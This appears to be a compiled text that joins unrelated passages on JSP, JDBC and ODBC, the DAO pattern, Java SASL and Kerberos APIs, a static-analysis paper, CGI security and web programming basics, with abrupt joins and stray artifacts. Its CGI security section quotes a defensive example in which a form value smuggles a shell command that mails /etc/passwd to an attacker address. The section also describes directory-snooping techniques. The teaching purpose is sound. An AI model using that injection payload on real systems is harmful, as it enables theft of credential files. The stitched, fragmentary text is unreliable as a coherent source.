Back

Access Models: A Java Server Pages file may be accessed in at least two different ways.
A clients request comes directly into a Java Server Page. In this scenario, suppose the page accesses reusable Java Bean components that perform particular well-defined computations like accessing a database. The result of the Beans computations, called result sets is stored within the Bean as properties. The page uses such Beans to generate dynamic content and present it back to the client. In both of the above cases, the page could also contain any valid Java code. Java Server Pages architecture encourages separation of content from presentation.
JDBC versus ODBC and other APIs At this point, Microsoft's ODBC (Open Database Connectivity) API is that probably the most widely used programming interface for accessing relational databases. It offers the ability to connect to almost all databases on almost all platforms. So why not just use ODBC from Java? The answer is that you can use ODBC from Java, but this is best done with the help of JDBC in the form of the JDBC-ODBC Bridge, which we will cover shortly. The question now becomes "Why do you need JDBC?" There are several answers to this question: 1. ODBC is not appropriate for direct use from Java because it uses a C interface. Calls from Java to native C code have a number of drawbacks in the security, implementation, robustness, and automatic portability of applications. 2. A literal translation of the ODBC C API into a Java API would not be desirable. For example, Java has no pointers, and ODBC makes copious use of them, including the notoriously error-prone generic pointer "void *". You can think of JDBC as ODBC translated into an object-oriented interface that is natural for Java programmers. 3. ODBC is hard to learn. It mixes simple and advanced features together, and it has complex options even for simple queries. JDBC, on the other hand, was designed to keep simple things simple while allowing more advanced capabilities where required.
A Java API like JDBC is needed in order to enable a "pure Java" solution. When ODBC is used, the ODBC driver manager and drivers must be manually installed on every client machine. When the JDBC driver is written completely in Java, however, JDBC code is automatically installable, portable, and secure on all Java platforms from network computers to mainframes.
JDBC-ODBC Bridge If possible, use a Pure Java JDBC driver instead of the Bridge and an ODBC driver. This completely eliminates the client configuration required by ODBC. It also eliminates the potential that the Java VM could be corrupted by an error in the native code brought in by the Bridge (that is, the Bridge native library, the ODBC driver manager library, the ODBC driver library, and the database client library). What Is the JDBC- ODBC Bridge? The JDBC-ODBC Bridge is a JDBC driver, which implements JDBC operations by translating them into ODBC operations. To ODBC it appears as a normal application program. The Bridge implements JDBC for any database for which an ODBC driver is available. The Bridge is implemented as the Sun.jdbc.odbc Java package and contains a native library used to access ODBC. The Bridge is a joint development of Innersole and Java Soft.
The majority of dynamic Web front ends are based on HTML forms, and users of such applications have come to expect from these applications certain behaviours, such as form validation. With standard JSP, this is a tedious process that involves recording the contents of the form and populating every form element with information from a JavaBean in case of error. Java facilitates this sort of form processing and validation using Custom tags. These, in combination with the JSP tag libraries, make View development with forms really simple and natural.
What is Model-View-Controller?
. Lets start by looking at how the Model, the View, and the Controller interact with one another:
Figure
1:
Model
2/MVC
architecture
DESIGN PATTERN Data Access Object
Context Access to data varies depending on the source of the data. Access to persistent storage, such as to a database, varies greatly depending on the type of storage (relational databases, object-oriented databases, flat files, and so forth) and the vendor implementation
Problem
Applications can use the JDBC API to access data residing in a relational database management system (RDBMS). The JDBC API enables standard access and manipulation of data in persistent storage, such as a relational database. The JDBC API enables J2EE applications to use SQL statements, which are the standard means for accessing RDBMS tables. However, even within an RDBMS environment, the actual syntax and format of the SQL statements may vary depending on the particular database product. There is even greater variation with different types of persistent storage. Access mechanisms, supported APIs, and features vary between different types of persistent stores such as RDBMS, object-oriented databases, flat files, and so forth.
Such disparate data sources offer challenges to the application and can potentially create a direct dependency between application code and data access code. When business components-entity beans, session beans, and even presentation components like servlets and helper objects for Java Server Pages (JSP) pages --need to access a data source, they can use the appropriate API to achieve connectivity and manipulate the data source. But including the connectivity and data access code within these components introduces a tight coupling between the components and the data source implementation. Such code dependencies in components make it difficult and tedious to migrate the application from one type of data source to another. When a data source changes, the components need to be changed to handle the new type of data source.
Forces
Portability of the components is directly affected when specific access mechanisms and APIs are included in the components. Components need to be transparent to the actual persistent store or data source implementation to provide easy migration to different vendor products, different storage types, and different data source types.
Solution
Use a Data Access Object (DAO) to abstract and encapsulate all access to the data source. The DAO manages the connection with the data source to obtain and store data. The DAO implements the access mechanism required to work with the data source. The data source could be a persistent store like an RDBMS, an external service like a B2B exchange, a repository like an LDAP database, or a business service accessed via CORBA Internet InterORB Protocol (IIOP) or low-level sockets. The business component that relies on the DAO uses the simpler interface exposed by the DAO for its clients. The DAO completely hides the data source implementation details from its clients. Because the interface exposed by the DAO to clients does not change when the underlying data source implementation changes, this pattern allows the DAO to adapt to different storage schemes without affecting its clients or business components. Essentially, the DAO acts as an adapter between the component and the data source.
Participants and Responsibilities

Business Object The Business Object represents the data client. It is the object that requires access to the data source to obtain and store data. A Business Object may be implemented as a session bean, entity bean, or some other Java object, in addition to a servlet or helper bean that accesses the data source. DataAccessObject The DataAccessObject is the primary object of this pattern. The DataAccessObject abstracts the underlying data access implementation for the Business Object to enable transparent access to the data source. The Business Object also delegates data load and store operations to the DataAccessObject. Transfer Object This represents a Transfer Object used as a data carrier. The DataAccessObject may use a Transfer Object to return data to the client. The DataAccessObject may also receive the data from the client in a Transfer Object to update the data in the data source.
Consequences:
Enables Transparency Business objects can use the data source without knowing the specific details of the data source's implementation. Access is transparent because the implementation details are hidden inside the DAO. Enables Easier Migration A layer of DAOs makes it easier for an application to migrate to a different database implementation. The business objects have no knowledge of the underlying data implementation. Thus, the migration involves changes only to the DAO layer. Further, if employing a factory strategy, it is possible to provide a concrete factory implementation for each underlying storage implementation. In this case, migrating to a different storage implementation means providing a new factory implementation to the application. Reduces Code Complexity in Business Objects Because the DAOs manage all the data access complexities, it simplifies the code in the business objects and other data clients that use the DAOs. All implementationrelated code (such as SQL statements) is contained in the DAO and not in the business object. This improves code readability and development productivity.
Centralizes All Data Access into a Separate Layer Because all data access operations are now delegated to the DAOs, the separate data access layer can be viewed as the layer that can isolate the rest of the application from the data access implementation. This centralization makes the application easier to maintain and manage.
Option&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&& &&& It is a framework into which specific authentication mechanisms that specify the contents and semantics of the authentication data can fit. There are many standard SASL mechanisms defined by the Internet community for various security levels and deployment scenarios. The Java SASL API defines classes and interfaces for applications that use SASL mechanisms. It is defined to be mechanism-neutral; an application that uses the API need not be hardwired into using any particular SASL mechanism. Applications can select the mechanism to use based on desired security features. The API supports both client and server applications. The javax.security.sasl.Sasl class is used to create SaslClient and SaslServer objects. SASL mechanism implementations are supplied in provider packages. Each provider may support one or more SASL mechanisms and is registered and invoked via the standard provider architecture. The Java platform includes a built-in provider that implements the following SASL mechanisms:
CRAM-MD5, DIGEST-MD5, EXTERNAL, GSSAPI, and PLAIN client mechanisms CRAM-MD5, DIGEST-MD5, and GSSAPI server mechanisms GSS-API and Kerberos The Java platform contains an API with the Java language bindings for the Generic Security Service Application Programming Interface (GSS-API). GSS-API offers application programmers uniform access to security services atop a variety of underlying security mechanisms. The Java GSS-API currently requires use of a Kerberos v5 mechanism, and the Java platform includes a built-in implementation of this mechanism. At this time, it is not possible to plug in additional mechanisms. Kerberos mechanism. Before two applications can use the Java GSS-API to securely exchange messages between them, they must establish a joint security context. The context encapsulates shared state information that might include, for example, cryptographic keys. Both applications create and use an org.ietf.jgss.GSSContext object to establish and maintain the shared information that makes up the security context. Once a security context has been established, it can be used to prepare secure messages for exchange. The Java GSS APIs are in the org.ietf.jgss package. The Java platform also defines basic Kerberos classes, like KerberosPrincipal and KerberosTicket, which are located in the javax.security.auth.kerberos package.
Data flow between a server and its client with regard to JSP: The JSP engine sends the request to whatever server-side component the JSP file specifies. The component handles the request, possibily retrieving data from a database or other data store and passes the response object to the JSP page,where its data is formatted according the pages HTML design. The JSP engine and web browser then send the revised JSP page back to the client, where the user can view the results in the web browser. The diagrammatic representation of data flow between a server and a client is shown below:
Client
Request
Response
JSP Engine & Web server
Response
Response Component
Request
.JSP File
Request
1. The JSP engine will translate the requested JSP file into a java file. 2. It will compile a java file to generate a servlet class. 3. It will create an object of the respective servlet class to process the client request along with request and response objects. 4. It provides some predefined objects. 5. It provides some tags. These tags are used to insert the required java code at the various positions in the corresponding java file generated by JSP engine. 6. It also provides servlet context, session tracking facilities.
By now almost everyone using servlets has heard about JavaServer Pages (JSP), a Sun-invented technology built on top of servlets. Sun has done a marvelous job promoting JSP as a way to get HTML out of servlet code, speeding web application development and improving web page maintenance. In fact, the official "Application Programming Model" document published by Sun has gone so far as to say, "JSP technology should be viewed as the norm while the use of servlets will most likely be the exception." (Section 1.9, December 15, 1999, Draft Release) This paper evaluates whether that claim is valid -- by comparing JSP to another technology built on servlets: template engines.
One can write a single program using the JDBC API, and the program will be able to send SQL statements to the appropriate database.
A recent empirical study of vulnerabilities found that parameter tampering, SQL injection, and cross-site scripting attacks account for more than a third of all reported Web application vulnerabilities. While different on the surface, all types of attacks listed above are made possible by user input that has not been (properly) validated. This set of problems is similar to those handled dynamically by the taint mode in Perl [52], even though our approach is considerably more extensible. We refer to this class of vulnerabilities as the tainted object propagation problem.
1.2 Code Auditing for Security Many attacks described in the previous section can be detected with code auditing. Code reviews pinpoint potential vulnerabilities before an application is run. In fact, most Web application development methodologies recommend a security assessment or review step as a separate development phase after testing and before application deployment. Code reviews, while recognized as one of the most effective defence strategies, are time-consuming, costly, and are therefore performed infrequently. Security auditing requires security expertise that most developers do not possess, so security reviews are often carried out by external security consultants, thus adding to the cost. In addition to this, because new security errors are often
introduced as old ones are corrected, double audits (auditing the code twice) is highly recommended. The current situation calls for better tools that help developers avoid introducing vulnerabilities during the development cycle.
1.3 Static Analysis This paper proposes a tool based on a static analysis for finding vulnerabilities caused by unchecked input. Users of the tool can describe vulnerability patterns of interest succinctly in PQL, which is an easy to-use program query language with a Java-like syntax. Our tool, as shown in Figure 1, applies user-specified queries to Java bytecode and finds all potential matches statically. The results of the analysis are integrated into Eclipse, a popular open-source Java development environment [13], making the potential vulnerabilities easy to examine and x as part of the development process. The advantage of static analysis is that it can nd all potential security violations without executing the application. The use of bytecode-level analysis obviates the need for the source code to be accessible. This is especially important since libraries whose source is unavailable are used extensively in Java applications. Our approach can be applied to other forms of bytecode such as MSIL, thereby enabling the analysis of C# code. Our tool is distinctive in that it is based on a precise context-sensitive pointer analysis that has been shown to scale to large applications. This combination of scalability and precision enables our analysis to find all vulnerabilities matching a specification within the portion of the code that is analyzed statically. In contrast, previous practical tools are typically unsound. Without a precise analysis, these tools would find too many potential errors, so they only report a subset of errors that are likely to be real problems. As a result, they can miss important vulnerabilities in programs.
3.1 Security issues in CGI CGI scripts are as dangerous as they are useful. This is not to say that you should not use them. Computer security is a give and take situation. You can never be safe so long as you offer services. However, without offering services you may as well not have the computer in the first place. Thus, security becomes more about acceptable risk and emergency recovery than impregnability. It is your job to make sure that the cons of a break have far less impact than the pros of having a web site. Selena discusses the fundamental concerns of security when installing and customizing pre-built CGI scripts, and gives pointers to further information. "All data is fraudulent. All communications are attempted hacks. All clients are thieves.
Technology is only my first line of defense" - morning litany for a Web Server Administrator The minute you connect your computer to the Internet is the minute that the security of your data has been compromised. Even the most secure systems, shepherded by the most intelligent and able system administrators, and employing the most up-to-date, tested software available are at risk every day, all day. As was proven by Kevin Mitnick in the celebrated cracking of the San Diego Supercomputer Center in 1994, even seasoned security veterans like Tsutomu Shimamura can be cracked. The sad fact is that crackers will always have the upper hand. Time, persistence, creativity, the complexity of software and the server environment, and the ignorance of the common user are their weapons. The system administrator must juggle dozens of ever-changing, complex security-related issues at once while crackers need only wait patiently for any slip up. And of course, system administrators are only human. Thus, the system administrator's job certainly can not be to build a "cracker-proof" environment. Rather, the system administrator can only hope to build a "cracker-resistant" environment. A cracker-resistant environment is one in which everything is done to make the system "as secure as possible" while making provisions such that successful cracks cause as little damage as possible. Thus, for example, at minimum the system administrator should backup all of the data on a system so that if the data is maliciously or accidentally erased or modified, as much of it as possible can be restored. By the way, don't think that just because your job title is not officially "system administrator" that this does not apply to you. In fact, as soon as you implement a CGI script, you become a system administrator of sorts. For example, the implementer of a Web Store CGI script will have her own users, data files, and security concerns. Here is a good rough check list of minimum level security precautions:
Make sure users understand what a good password is and what a bad password is. Good passwords cannot be found in a dictionary and take advantage of letters, numbers and symbols. Good passwords are also changed with some regularity and are not written on scraps of paper in desk drawers. Make sure that file permissions are set correctly. Make sure to keep abreast of security announcements, bug fixes and patches. For example, put yourself on a CERT or CIAC mailing list and/or return regularly to the sites which distribute the code you use. Attempt to crack your site regularly. Learn the tools the crackers are using against you and try your best to use those tools to crack yourself. Make regular backups.
Create and check your log files regularly.
The security managers in both JDK and Netscape typically use the contents of the call stack to decide whether or not to grant access. Java uses its type system to provide protection for the security manager. If Javas type system is sound, then the security manager should be tamperproof. By using types, instead of separate address spaces for protection, Java is embeddable in other software, and performs better because protection boundaries can be crossed without a context switch.
What is the worst that can happen? Protecting your site is a serious matter and one that everyone should take time to deal with. Unfortunately, too many web admins make the mistake of saying that, "Since I am not a high visibility site, and I don't have a beef with anyone else no one will bother to mess with me." In fact, you are a target as soon as you have a web presence. Many crackers need no greater excuse than the desire to cause mischief to crack your site. Once a cracker has access to your system, he or she can do all sorts of mean and nasty things. Consider some of the following possibilities: Your data/files are erased Your data/files are sold to your competitor Your data/files are modified. Check out what happened to the CIA site and others! The Cracker uses your site to launch attacks against others. For example, the cracker attempts to crack the White House server as you! Security and Web Servers Web servers are one of the most dangerous services you can offer. Essentially, a web server gives the entire net access to the inner workings of your file system. What is worse is the fact that since web server software has only been around since the end of the 1980's, the security community has only had a limited amount of time to scrutinize security holes. Thus, web servers amount to extremely powerful programs which have only been partially bug tested. If that were not bad enough, web servers are typically administered by new admins with perhaps more experience in graphic design than server administration. Further many web servers are home to hundreds of users who barely know enough about computers to write HTML and who are often too busy with their own
deadlines to take a moment to read articles such as this!. This is not to point fingers at anyone. Few people have time or inclination to master security and that is as it should be. The point is that bad passwords, poorly written programs, world readable files and directories and so forth will always be part of the equation. CGI Scripts Beyond the fact that web servers are insecure to begin with, web servers make a bad situation worse by allowing users to take advantage of CGI scripts. CGI scripts are programs that reside on a server and can be run from a web browser. In other words, CGI scripts allow Joe Cyberspace to execute powerful programs on your server which are in all likelihood first generation, designed by amateurs, and full of security holes. Yet, since most users have grown to expect CGI access, few system administrators can deny their users the ability to write, install and make public CGI scripts of all sorts. So what is a web master to do and how can users of CGI scripts help to promote the security of the server as a whole? As is the case with all security, the admin and users must attempt to address the following precautions: CGI scripts must be made "as safe as possible". The inevitable damages caused by cracked CGI scripts must be contained.
Reviewing Scripts Needless to say, every script installed on a server should be reviewed by as many qualified people as possible. At very least the system administrator should be given a copy of the code (before and after your modifications), information about where you got the code, and anything else she asks for. Don't think of your system administrator as a paranoid fascist. She has a very serious job to do. Help her to facilitate a safer environment for everyone even if that means a little more work for you. Besides that, you should read the code yourself! There is no better time to learn this stuff than now. Although ignorant users will necessarily be part of the security equation it does not give you the go ahead to be one of those users! And remember, any bit of code you do not understand is suspect! As a customer, demand that script authors explain and document their code clearly and completely. However, you have a further responsibility. You have the responsibility to keep aware of patches, bug fixes, and security announcements. It is likely that such information will be posted on the site from which you got the script. It certainly is posted on my Script Archive. As new versions come out, you should do your best to upgrade and when security announcements are issued, you must make the necessary modifications as soon as possible. The fact that the information is available to you means that the information is also available to crackers who will probably use it as soon as it is available. This point is particularly important for all you freelance CGI developers who install scripts for clients and then disappear into the sunset. It is essential that you take the responsibility to develop an ongoing relationship with
your clients so that when security patches are released you can notify them so they can hire you or someone else to implement the security changes. Writing Safe CGI Scripts Although this article is primarily focussed on installing and customizing pre-built web scripts, no discussion of security would be complete without a note on writing safe code. After all, some of the installation/customization work you do might involve writing some code. Perhaps the best source for information on writing safe CGI scripts can be found at Lincoln Stein's WWW Security FAQ. Lincoln Stein is a gifted CGI programmer with several public domain talks and FAQS regarding techniques for writing safe CGI. You should not even consider writing or installing a CGI script until you have read the entire FAQ! However, I will reproduce the most important warning since it should be said several times. Stein writes the following, "Never, never, never pass unchecked remote user input to a shell command. In C this includes the popen(), and system() commands, all of which invoke a /bin/sh subshell to process the command. In Perl this includes system(), exec(), and piped open() functions as well as the eval() function for invoking the Perl interpreter itself. In the various shells, this includes the exec and eval commands. Backtick quotes, available in shell interpreters and Perl for capturing the output of programs as text strings, are also dangerous. The reason for this bit of paranoia is illustrated by the following bit of innocent-looking Perl code that tries to send mail to an address indicated in a fill-out form. $mail_to = &get_name_from_input; # read the address from form open (MAIL,"| /usr/lib/sendmail $mail_to"); print MAIL "To: $mailto\nFrom: me\n\nHi there!\n"; close MAIL; The problem is in the piped open() call. The author has assumed that the contents of the $mail_to variable will always be an innocent e-mail address. But what if the wiley hacker passes an e-mail address that looks like this? nobody@nowhere.com; mail badguys@hell.org</etc/passwd; Now the open() statement will evaluate the following commands: /usr/lib/sendmail nobody@nowhere.com mail badguys@hell.org</etc/passwd Unintentionally, open() has mailed the contents of the system password file to the remote user, opening the host to password cracking attack." Other CGI security FAQS include: NCSA Security
Stopping Snoopers Have you ever investigated a web site by modifying the URL? For example, let's look at the 1990 U.S. Census Page at the Lawrence Berkeley Lab which can be found at http://cedr.lbl.gov/cdrom/doc/lookup_doc.html. Notice that we are looking at the document lookup_doc.html which is in the directory "docs" which is located in
the "cdrom" directory which is also a root level directory of the web server "cedr.lbl.gov". Suppose we are interested in what other documents are located in the "doc" directory (perhaps documents under development, documents which have been forgotten about, or documents which might have unlisted links for internal use only). In this case, we remove the "lookup_doc.html" reference and test to see if they have set their web server to generate a dynamic index. In this case, they have. Here is what we get when we remove the lookup_doc.html ending: What you are looking at is a dynamically created index page containing all files and sub-directories. In fact, many servers on the web are configured so that if the user has not provided an index.html file, the server will output a directory listing much like this. If the server is set to produce a dynamically generated index of a cgi-bin directory, the results can be devastating. Consider the following figure in which we see that the entire contents of a cgi directory are displayed to the web user: What do you suppose will happen when a user clicks on the auth.setup file? Well since the web server must execute this CGI script, the web server will certainly have permission to read the contents of the file. Thus the cracker will receive the contents of your setup file in their web browser window. As you might imagine, this file could easily include crucial bits of security, path, configuration information which in the hands of the cracker could be the end of you. Needless to say, setup files are not the only files at risk. Other files include password files, temporary working files, user files, and anything else that might give the cracker information about how to break your program for his/her own benefit. As such, it is essential that you do one or all of the following things: Configure the web server to not generate dynamically produced indexes but return an error message instead. Configure your web server to not serve any document other than a .cgi document from within a cgi-bin directory tree. Provide an index.html file with nothing in it so that even if the web server is not configured for CGI security, the cracker will be stopped in their tracks.
There is another aspect of the snooper that you should definitely be aware of when installing pre-built scripts. Snoopers have just as much ability to download the source code and read through it as you do. Thus, they are aware of all of the pre configured options that are set by default. In particular, they are aware of filenames and relative directory locations. Thus, if you do not change the default names of files and directories, even if you have stopped them from using the back door and getting directory listings as shown above, they will still know what is available and can access it directly. In other words, if I know that you are using "CGI script A" and that "CGI script A" uses a file called "users.dat" in a subdirectory called "Users" I might look for it directly using: http://www.yourdomain.com/cgi-bin/ScriptA/Users/users.dat In such a way, a cracker could easily gain sensitive information. As a result, it is crucial that you also rename any file or directory that contains sensitive information. Once you have made it impossible for the hacker to get a dynamically generated index and you have changed all filenames and directory names, it will be much more difficult for the cracker to find his/her way in. Writable Directories
It is pretty much unavoidable. Any truly complex CGI application is going to have to write to the file system. Examples of writing to the file system include adding to a password file of registered users, creating lock and log files, or creating temporary state maintenance files. The problem with this is two fold. First, if the web surfer is given permission to write, she is also, necessarily given permission to delete. Writing and deleting come hand in hand. They are considered equal in terms of server security. The second problem with writable files is that it is possible that a cracker could use the writable area within your cgi-bin tree to add a CGI script of their own! This is particularly dangerous on multi-user servers such as those used by your typical ISP. A cracker need only get a legitimate account at the same ISP you are on long enough to exploit the security hole. This amounts to 20 minutes worth of payment on their part. By the way, this cracker tactic of getting an account on your ISP also has serious implications for "snooping". If the cracker can get an account on your server, there is little to stop her from getting at your cgi-bin directory and snooping around. With luck, your ISP runs a CGI wrapper which will obfuscate your CGI-BIN area to some degree, but one way or the other, so long as you host your website on a shared server, your security is seriously compromised. This makes backups even more crucial! For the most part, the solution to this is to never store writable directories or files within your cgi-bin tree. All writable directories should be stored in less sensitive areas such as your HTML tree or in directories like /tmp which are already provided for insecure file manipulation. A cracker could still erase your data but they could not execute their own rogue CGI script. Thus, not only should you change the names of all files in CGI scripts, but you should also move them to safer locations on your server. If the CGI script you are using is good, it should have all of this file naming and location information in a setup file so you do not have to muck around in the code. However, as we said before, security is about constraining damage as well as it is about plugging holes. Thus, it is essential that you protect all files against writing unless you are currently working on them. In other words, if you are not editing an HTML file, it should be set to read-only access. If you are not currently editing the code of a CGI script, it should be stored as read-execute-only. In short, never grant write permission to any file on your web server unless you are specifically editing that file. Finally, backup your files regularly. Expect and prepare for the worst. If you are on a UNIX system, you should tar your entire site at least once every few days using the command tar cvfp name.tar rootdirectoryname You should then move that file onto a non-network connected machine or at very least set permissions such as: chmod 400 Windows users should use a program like WinZip95 to create archives. User Input All input is an attempted hack. All input is an attempted hack. All input is an attempted hack. Learn those words and repeat them to yourself every day. It is essential for you to consider all information that comes into your CGI script as tainted. The example provided by Lincoln Stein above is a good example of the kinds of havoc a cracker can create with tainted data. A cracker could easily attempt to use your CGI to execute damaging commands. An interesting addition to what Stein's has to say relates to Server Side Includes (SSI). That is, if your server is
set to execute server side includes, it is possible that your CGI script could be used to execute illegitimate code. Specifically, if the CGI script allows a user to input text that will be echoed back to the web browser window, the cracker could easily input SSI code. This is a common mis configuration error for programs like Guestbooks. The solution to this problem, of course, is to filter all user data and remove any occurrence of SSI commands. Typically, this is done by changing all occurences of "<!" to "<-". Thus, SSI commands will be printed out instead of executed. A better option is to disable SSI which is even more dangerous than CGI, especially when combined with CGI. Another thing to understand about the legitimacy of incoming data is that even the data which is supposedly generated administratively can be tainted. It is very easy, for example, to modify hidden form fields or add custom fields to incoming form data to a script. In fact, a cracker could simply download your HTML form, modify it and submit faulty data to your CGI script from their own server.
Introduction to Web Programming:
Tutorials
Web Programming 101 At some point along the way webmasters around the net realized that HTML (1) was too limited to do many of the things that they wanted to accomplish. How could a webmaster display the current time and date on every page accessed by a client? How could she collect information about clients who were accessing her web site? How could she create a web site that was more than just an information warehouse, but a meaningful and dynamic conversation? Certainly, HTML was great for distributing "pre-prepared" web pages on request. A client would use a web browser to contact a web server and use HTTP to ask the web server for a specific HTML document. (2) The web server would then send the requested document back to the web browser which in turn, would display the document as defined by the HTML to the client.
Pretty nifty really, and far superior to older technologies like gopher and ftp. However, the interaction between the client and the server was still extremely trivial. The server could only provide HTML documents that had been specially encoded by a webmaster, and that had been placed in certain publicly-accessible directories. The interaction between web browser and web server was pretty mind numbingly simplistic and the coolness of surfing through hyperlinks quickly became droll. HTML fell short for anything truly "dynamic". For example, to put the current date on every page using only HTML would require a webmaster to manually edit every file, every day. As you can imagine, this got tiring very quickly for sites with more than 5 pages. Webmasters needed a way to have HTML pages created and modified "on-the-fly," with information that could change weekly, daily, by the second, or for each and every request. And they needed those pages to be modified automatically, without their constant oversight.
As it so happens, the hardware that web server software runs on typically has quite a few resources that can be utilized to help solve these problems. Not only do servers have processing power to spare, they also have a battery of applications (such as e-mail, database manipulation, or calendaring) already installed and ripe for utilization. And thus was born CGI (Common Gateway Interface). (3) CGI: The Birth of Server Side Web Programming As with most computer jargon, the term Common Gateway Interface can be fairly meaningless at first glance. So, before getting into what CGI can do, let's take a moment to define what CGI actually is.
Common - CGI programs can be written with many languages. CGI can be programmed in C, C++, Java, Perl, Visual Basic, or any other language that can accept user input, process that input, and respond with output. Further, CGI works with many different types of systems. CGI works on Mac, NT, Windows, OS2, Amiga, UNIX, and pretty much every operating system that runs web server software. By the way, if you use a "platform independent" language like Perl or Java to write your CGI script, the exact same CGI script can be moved directly from one platform to another without it breaking! (4)
Gateway - CGI's usefulness does not stem from what it can accomplish by itself, but what it can accomplish by making partnerships with other resources. I often see CGI as a middleman or a translator whose job it is to help more powerful resources like databases, graphics generation programs, or network applications talk to each other and work towards a common solution. CGI is the gateway between the lone web surfer with her trusty web browser and the vast web of computers (each with their own specific language and protocols) and computer programs (each with their own interfaces and methods of output). CGI translates between the language the client speaks (perhaps HTMLized English) and the multitude of languages spoken by the resources the client wants to utilize (such as SQL for relational databases). This is a crucial job, cause let me tell ya, my grandmother does not want to know how to speak SQL when she is browsing the web!
Interface - CGI is not a language. Neither is it a program. CGI is a standard of communication, a process, an interface that provides well-defined rules for creating partnerships. The benefit is that if everyone follows the rules of the interface, then everyone can talk to each other. Thus, typically we say that we write "CGI programs" or "CGI scripts" that perform the functions of the common gateway interface.
Let's look at the CGI processes in the following chart.
Okay, so that is probably a lot of abstract stuff to take in all at once, especially if you have not worked with CGI already. So let's back up a minute and go over what CGI is by looking at it in the wild. Let's look at some examples of CGI in action. Processing Forms - One common use for CGI is providing a way for web surfers to enter data into HTML forms and send that data to some site administrator. Take a look at this Feedback Form Demo. Try it out! With a feedback form, the web surfer can not only read pre-prepared HTML documents, but can actually send feedback in response. Forget about doing that with HTML alone. This form processing script actually takes the data input by the web surfer and sends it as e-mail to the form administrator. Another common form processing application is the Guestbook that allows web surfers to leave publicly readable greetings. The CGI manages a common file on the web server that everyone can read and write to. Discussing Things - More than simply allowing clients to "talk back", CGI helps in creating
an ongoing dialog between multiple clients. Check out this Bulletin Board System that actually lets many people collectively create an archive of related messages. And when you're done with that, check out how CGI implements Realtime Chatthat allows people to chat anywhere in the world in real time (as if it were a telephone call but typed) Shopping - CGI has also been very useful in selling products on the web. Take a look at this Demonstration Web Store. Databases - Finally, CGI can be used to manage databases. Here is an example of a Database Management System for CGI. And here is a similar application used to perform Groupware Calendaring
You can easily see that CGI makes for a much more profound surfing experience allowing web sites to offer useful and compelling services to surfers who may be interested in information or products offered. (5) However, there is a dark side! CGI sucks! Well, as you might expect, for all its dynamism, CGI was not a holy grail. In fact, there are a lot of sysadmins out there who would be ecstatic if CGI were outlawed. CGI simply causes too many problems. CGI introduces security holes. Lincoln Stein writes the following eloquent warning on the problem: Unfortunately, there's a lot to worry about [when running a web server with CGI]. The moment you install a Web server at your site, you've opened a window into your local network that the entire Internet can peer through. Most visitors are content to window shop, but a few will try to peek at things you don't intend for public consumption. Others, not content with looking without touching, will attempt to force the window open and crawl in. It's a maxim in system security circles that buggy software opens up security holes. It's a maxim in software development circles that large, complex programs contain bugs. Unfortunately, Web servers are large, complex programs that can (and in some cases have been proven to) contain security holes. Furthermore, the open architecture of Web servers allows arbitrary CGI scripts to be executed on the server's side of the connection in response to remote requests. Any CGI script installed at your site may contain bugs, and every such bug is a potential security hole. It is one thing to allow any freako on the Internet access to your web server, when the communication is controlled through the boundaries defined by HTTP and implemented by web browsers. It is another thing to allow a stranger access to an unlimited amount of applications housed on the same server through a renegade CGI script. In the WWW Security FAQ, Stein identifies four overlapping types of risk: o o o o Private or confidential documents stored in the Web site's document tree may fall into the hands of unauthorized individuals. Private or confidential information sent by the remote user to the server (such as credit card information) might be intercepted. Information about the Web server's host machine might leak through, giving outsiders access to data that can potentially allow them to break into the host. Bugs can allow outsiders to execute commands on the server's host machine, allowing them to modify and/or damage the system. This includes "denial of service" attacks, in which the attackers pummel the machine with so many requests that it is
rendered effectively useless. I recommend checking out the following CGI Security sites if you are interested in getting more detailed information. o o o o Writing safe CGI scripts -- an overview (Paul Phillips) NCSA's tips for writing secure CGI scripts Latro, a tool for identifying insecure Perl CGI installations, by Tom Christiansen Are You Safe? (Keith Gardner)
CGI is at the mercy of HTTP. It is important to note that HTTP only provides for a one-time, question/answer type of communication. After all, it was defined primarily for web browsers and web servers to exchange HTML documents. Thus, by definition, HTTP is not very dynamic. One-time, question/answer communication works like this: the web browser and the web server are only connected as long as it takes for the web browser to send one document request and the web server to send one requested document. If the browser wants a second document, it must recontact the server and ask again. Each request is new. The server maintains no ongoing connection or record of past exchanges. While this is very efficient for network traffic (because the bandwidth is only used when information needs to be exchanged), it is a big pain in the butt when it comes to CGI, because CGI is about conversations, not about one-time question/answers Imagine that when talking on the phone you had to hang up and redial every time you said something and received an answer. Imagine further that every time you called back you had to go over every previous exchange before you could get to the next piece. That is the way web browsers work with web servers and this makes communication tough. This makes communication tough for three reasons. First, if the client and server are to maintain information over several exchanges, the CGI must be responsible for keeping a running dictation of the conversation so that every time there is a new exchange, the web server can consult the record of the entire conversation up to that point. This is what CGI aficionados call "maintaining state". The CGI script must be able to keep track of certain information like username or the contents of a virtual shopping cart for every "instance" of a script. (6). That is, there must be a way to tie the current HTTP request to related ones that have gone on before. Maintaining state is possible with CGI using hidden variables, by encoding the URL, or by maintaining a state file on the server, it's just not easy or efficient. (7). Second, every set of question/answers causes the web server to execute a unique instance of the CGI script. This is pretty expensive, especially on a high volume web site that may have 100 instances of a CGI script executing at any given moment, each, perhaps, with its own Perl interpreter. (8) Every one of those CGI scripts takes a little bit of umph out of the server engine. If we were not limited to question/answer format, we would not need to execute so many instances. Consider the following CGI application executing....
Client: Hello? Server: Welcome, what would you like (CGI script executed once)
Client: I would like a list of products you are selling Server: Here is a list (another one) Client: I want to purchase this product Server: Okay. (yep)
Client: I'm done, can I check out? Server: Yes, what is your credit card number? (another script) Client: Here it is. the Server: Thanks (another instance of the script that also emails results to some store admin) (9)
